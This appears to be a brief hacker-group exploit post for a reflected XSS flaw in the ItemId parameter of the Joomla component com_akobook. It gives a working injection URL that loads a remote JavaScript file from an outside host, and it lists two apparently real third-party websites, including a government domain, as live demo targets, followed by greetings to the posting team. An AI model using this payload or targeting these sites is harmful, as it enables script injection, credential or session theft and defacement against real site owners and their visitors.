Joomla component com_akobook is vulnerable to XSS. It was in HTTP GET Parameter ItemId
Example: http://bokep.com/index.php?option=com_akobook&ItemId=1
XSS can be exploited at the HTTP GET Parameter ItemId by adding /"> at the end
Example: http://bokep.com/index.php?option=com_akobook&ItemId=1/"><script type=text/javascript src=ghost.com/p4kl0nc4t.js></script>
Demo:
www.pa-wonosobo.go.id
www.percik.or.id
Special thanks to: Obsidian Cyber Team, XCode1210, XxX, Mr.Cakil, and all OCT Members.